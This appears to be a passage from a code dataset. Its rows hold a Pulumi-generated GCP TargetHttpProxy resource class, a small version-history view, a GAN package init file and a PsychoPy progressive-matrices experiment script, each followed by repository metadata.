pulumi.set(self, "proxy_bind", value)
@pulumi.input_type
class _TargetHttpProxyState:
def __init__(__self__, *,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None,
proxy_id: Optional[pulumi.Input[int]] = None,
self_link: Optional[pulumi.Input[str]] = None,
url_map: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering TargetHttpProxy resources.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
:param pulumi.Input[int] proxy_id: The unique identifier for the resource.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
if creation_timestamp is not None:
pulumi.set(__self__, "creation_timestamp", creation_timestamp)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if proxy_bind is not None:
pulumi.set(__self__, "proxy_bind", proxy_bind)
if proxy_id is not None:
pulumi.set(__self__, "proxy_id", proxy_id)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if url_map is not None:
pulumi.set(__self__, "url_map", url_map)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@creation_timestamp.setter
def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_timestamp", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="proxyBind")
def proxy_bind(self) -> Optional[pulumi.Input[bool]]:
"""
This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "proxy_bind")
@proxy_bind.setter
def proxy_bind(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "proxy_bind", value)
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> Optional[pulumi.Input[int]]:
"""
The unique identifier for the resource.
"""
return pulumi.get(self, "proxy_id")
@proxy_id.setter
def proxy_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "proxy_id", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> Optional[pulumi.Input[str]]:
"""
A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
return pulumi.get(self, "url_map")
@url_map.setter
def url_map(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_map", value)
class TargetHttpProxy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a TargetHttpProxy resource, which is used by one or more global
forwarding rule to route incoming HTTP requests to a URL map.
To get more information about TargetHttpProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/targetHttpProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Target Http Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
### Target Http Proxy Https Redirect
```python
import pulumi
import pulumi_gcp as gcp
default_url_map = gcp.compute.URLMap("defaultURLMap", default_url_redirect=gcp.compute.URLMapDefaultUrlRedirectArgs(
https_redirect=True,
strip_query=False,
))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
## Import
TargetHttpProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default projects/{{project}}/global/targetHttpProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
:param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TargetHttpProxyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a TargetHttpProxy resource, which is used by one or more global
forwarding rule to route incoming HTTP requests to a URL map.
To get more information about TargetHttpProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/targetHttpProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Target Http Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
### Target Http Proxy Https Redirect
```python
import pulumi
import pulumi_gcp as gcp
default_url_map = gcp.compute.URLMap("defaultURLMap", default_url_redirect=gcp.compute.URLMapDefaultUrlRedirectArgs(
https_redirect=True,
strip_query=False,
))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
## Import
TargetHttpProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default projects/{{project}}/global/targetHttpProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param TargetHttpProxyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TargetHttpProxyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TargetHttpProxyArgs.__new__(TargetHttpProxyArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["proxy_bind"] = proxy_bind
if url_map is None and not opts.urn:
raise TypeError("Missing required property 'url_map'")
__props__.__dict__["url_map"] = url_map
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["proxy_id"] = None
__props__.__dict__["self_link"] = None
super(TargetHttpProxy, __self__).__init__(
'gcp:compute/targetHttpProxy:TargetHttpProxy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None,
proxy_id: Optional[pulumi.Input[int]] = None,
self_link: Optional[pulumi.Input[str]] = None,
url_map: Optional[pulumi.Input[str]] = None) -> 'TargetHttpProxy':
"""
Get an existing TargetHttpProxy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
:param pulumi.Input[int] proxy_id: The unique identifier for the resource.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TargetHttpProxyState.__new__(_TargetHttpProxyState)
__props__.__dict__["creation_timestamp"] = creation_timestamp
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["proxy_bind"] = proxy_bind
__props__.__dict__["proxy_id"] = proxy_id
__props__.__dict__["self_link"] = self_link
__props__.__dict__["url_map"] = url_map
return TargetHttpProxy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="proxyBind")
def proxy_bind(self) -> pulumi.Output[bool]:
"""
This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "proxy_bind")
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> pulumi.Output[int]:
"""
The unique identifier for the resource.
"""
return pulumi.get(self, "proxy_id")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Output[str]:
"""
A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
return pulumi.get(self, "url_map")
| 42.522581 | 134 | 0.636019 | 3,082 | 26,364 | 5.261843 | 0.085334 | 0.059012 | 0.056977 | 0.055621 | 0.871185 | 0.848492 | 0.832645 | 0.823025 | 0.81988 | 0.784547 | 0 | 0.005067 | 0.273896 | 26,364 | 619 | 135 | 42.591276 | 0.842083 | 0.480693 | 0 | 0.677165 | 1 | 0 | 0.083618 | 0.003769 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161417 | false | 0.003937 | 0.019685 | 0 | 0.279528 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c32d755b701c2eff52112133c79c6f396a89265a | 193 | py | Python | turkey/version_history.py | geokala/quizify | 1096423880dd50b935fcd31fc6ffbbe1cca65834 | [
"BSD-3-Clause"
] | null | null | null | turkey/version_history.py | geokala/quizify | 1096423880dd50b935fcd31fc6ffbbe1cca65834 | [
"BSD-3-Clause"
] | null | null | null | turkey/version_history.py | geokala/quizify | 1096423880dd50b935fcd31fc6ffbbe1cca65834 | [
"BSD-3-Clause"
] | null | null | null | from turkey.utils import render_turkey
from turkey.version import version_history
def version_history_view():
return render_turkey("version_history.html", version_history=version_history)
| 32.166667 | 81 | 0.84456 | 26 | 193 | 5.961538 | 0.423077 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093264 | 193 | 5 | 82 | 38.6 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0.103627 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
5eebddc903838bba54271921cf9e56f50dfaa93f | 154 | py | Python | architectures/cond_dcgan_spect_norm_pixelnorm_minibatchstd_self_attention/__init__.py | alexpod1000/FaceGen-GAN | 202b59f7bf8b6a48bba8a30fed16db6517af4eb7 | [
"MIT"
] | 8 | 2020-08-13T12:25:09.000Z | 2022-03-02T04:54:27.000Z | architectures/cond_dcgan_spect_norm_pixelnorm_minibatchstd_self_attention/__init__.py | alexpod1000/FaceGen-GAN | 202b59f7bf8b6a48bba8a30fed16db6517af4eb7 | [
"MIT"
] | null | null | null | architectures/cond_dcgan_spect_norm_pixelnorm_minibatchstd_self_attention/__init__.py | alexpod1000/FaceGen-GAN | 202b59f7bf8b6a48bba8a30fed16db6517af4eb7 | [
"MIT"
] | null | null | null | from .generator import Generator
from .discriminator import Discriminator
from .gan_wrapper import GAN_Wrapper
from .gan_wrapper_ema import GAN_WrapperEMA | 38.5 | 43 | 0.876623 | 21 | 154 | 6.190476 | 0.380952 | 0.230769 | 0.215385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097403 | 154 | 4 | 43 | 38.5 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6f0a38fde9ffc17e83dcf49d24ef7000159e0552 | 73,463 | py | Python | Matrices/Matrices_lastrun.py | NCMlab/CogntiveTasksOnline | 02e2bdb2b54a96b609fd5658cac4323322f183f0 | [
"MIT"
] | 5 | 2019-06-20T03:27:55.000Z | 2022-03-06T07:31:36.000Z | Matrices/Matrices_lastrun.py | NCMlab/CogntiveTasksOnline | 02e2bdb2b54a96b609fd5658cac4323322f183f0 | [
"MIT"
] | 9 | 2018-10-23T02:11:00.000Z | 2019-07-03T15:29:07.000Z | Matrices/Matrices_lastrun.py | NCMlab/CogntiveTasksOnline | 02e2bdb2b54a96b609fd5658cac4323322f183f0 | [
"MIT"
] | 2 | 2020-08-24T13:55:57.000Z | 2022-03-06T07:31:40.000Z | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.85.1),
on Fri Nov 2 12:06:06 2018
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import absolute_import, division
from psychopy import locale_setup, gui, visual, core, data, event, logging, sound
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__)).decode(sys.getfilesystemencoding())
os.chdir(_thisDir)
# Store info about the experiment session
expName = 'Matrices' # from the Builder filename that created this script
expInfo = {u'session': u'001', u'participant': u''}
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=u'/Users/jasonsteffener/Documents/GitHub/CognitiveTasks/Matrices/Matrices.psyexp',
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
size=(1440, 900), fullscr=True, screen=0,
allowGUI=False, allowStencil=False,
monitor='testMonitor', color=[0,0,0], colorSpace='rgb',
blendMode='avg', useFBO=True,
units='pix')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
frameDur = 1.0 / round(expInfo['frameRate'])
else:
frameDur = 1.0 / 60.0 # could not measure, so guess
# Initialize components for Routine "Instructions"
InstructionsClock = core.Clock()
Instruct = visual.TextStim(win=win, name='Instruct',
text='Progressive Matrices\n\nThis is a test of observation and clear thinking.\nAt the top of the screen you will see a pattern with a bit cut out of it. You will look at the pattern, think what the piece must be that is needed to complete the pattern correctly both along and down. Then find the right piece out of the eight bits shown below.\nOnly one of these pieces is perfectly correct.\n\nPress any key to perform practice trials.',
font='Arial',
pos=(0, 0), height=40, wrapWidth=1000, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 200), size=1.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
CFig1 = visual.ImageStim(
win=win, name='CFig1',
image='sin', mask=None,
ori=0, pos=(-225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
CFig2 = visual.ImageStim(
win=win, name='CFig2',
image='sin', mask=None,
ori=0, pos=(-75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
CFig3 = visual.ImageStim(
win=win, name='CFig3',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-3.0)
CFig4 = visual.ImageStim(
win=win, name='CFig4',
image='sin', mask=None,
ori=0, pos=(225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-4.0)
CFig5 = visual.ImageStim(
win=win, name='CFig5',
image='sin', mask=None,
ori=0, pos=(-225, -225), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-5.0)
CFIg6 = visual.ImageStim(
win=win, name='CFIg6',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-6.0)
Opt1 = visual.TextStim(win=win, name='Opt1',
text=u'1',
font=u'Arial',
pos=(-170, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-7.0);
Opt2 = visual.TextStim(win=win, name='Opt2',
text=u'2',
font=u'Arial',
pos=(-20, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-8.0);
Opt3 = visual.TextStim(win=win, name='Opt3',
text=u'3',
font=u'Arial',
pos=(130, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-9.0);
Opt4 = visual.TextStim(win=win, name='Opt4',
text=u'4',
font=u'Arial',
pos=(280, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-10.0);
Opt5 = visual.TextStim(win=win, name='Opt5',
text=u'5',
font=u'Arial',
pos=(-170, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-11.0);
CFig7 = visual.ImageStim(
win=win, name='CFig7',
image='sin', mask=None,
ori=0, pos=(75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-13.0)
CFig8 = visual.ImageStim(
win=win, name='CFig8',
image='sin', mask=None,
ori=0, pos=(225, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-14.0)
Opt6 = visual.TextStim(win=win, name='Opt6',
text=u'6',
font=u'Arial',
pos=(-20, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-15.0);
Opt7 = visual.TextStim(win=win, name='Opt7',
text=u'7',
font=u'Arial',
pos=(130, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-16.0);
Opt8 = visual.TextStim(win=win, name='Opt8',
text=u'8',
font=u'Arial',
pos=(280, -180), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-17.0);
# Initialize components for Routine "Feedback1"
Feedback1Clock = core.Clock()
Prac1Feedback = visual.TextStim(win=win, name='Prac1Feedback',
text=u'Here the correct answer is 3. \nEvery row and column has a circle, diamond and a square in it. In addition each row and column has one cell with one, two or three concentric shapes. Therefore, the missing cell needs to have three concentric shapes be a diamond shape.\n\nPress any key to continue.',
font=u'Arial',
pos=(-350, -140), height=30, wrapWidth=600, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=0.0);
Prac1Matrix = visual.ImageStim(
win=win, name='Prac1Matrix',
image='sin', mask=None,
ori=0, pos=(0, 200), size=(430, 380),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
Prac1Choice = visual.ImageStim(
win=win, name='Prac1Choice',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
# Initialize components for Routine "crosshair"
crosshairClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='+',
font='Arial',
pos=(0, 0), height=40, wrapWidth=None, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 200), size=1.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
CFig1 = visual.ImageStim(
win=win, name='CFig1',
image='sin', mask=None,
ori=0, pos=(-225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
CFig2 = visual.ImageStim(
win=win, name='CFig2',
image='sin', mask=None,
ori=0, pos=(-75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
CFig3 = visual.ImageStim(
win=win, name='CFig3',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-3.0)
CFig4 = visual.ImageStim(
win=win, name='CFig4',
image='sin', mask=None,
ori=0, pos=(225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-4.0)
CFig5 = visual.ImageStim(
win=win, name='CFig5',
image='sin', mask=None,
ori=0, pos=(-225, -225), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-5.0)
CFIg6 = visual.ImageStim(
win=win, name='CFIg6',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-6.0)
Opt1 = visual.TextStim(win=win, name='Opt1',
text=u'1',
font=u'Arial',
pos=(-170, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-7.0);
Opt2 = visual.TextStim(win=win, name='Opt2',
text=u'2',
font=u'Arial',
pos=(-20, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-8.0);
Opt3 = visual.TextStim(win=win, name='Opt3',
text=u'3',
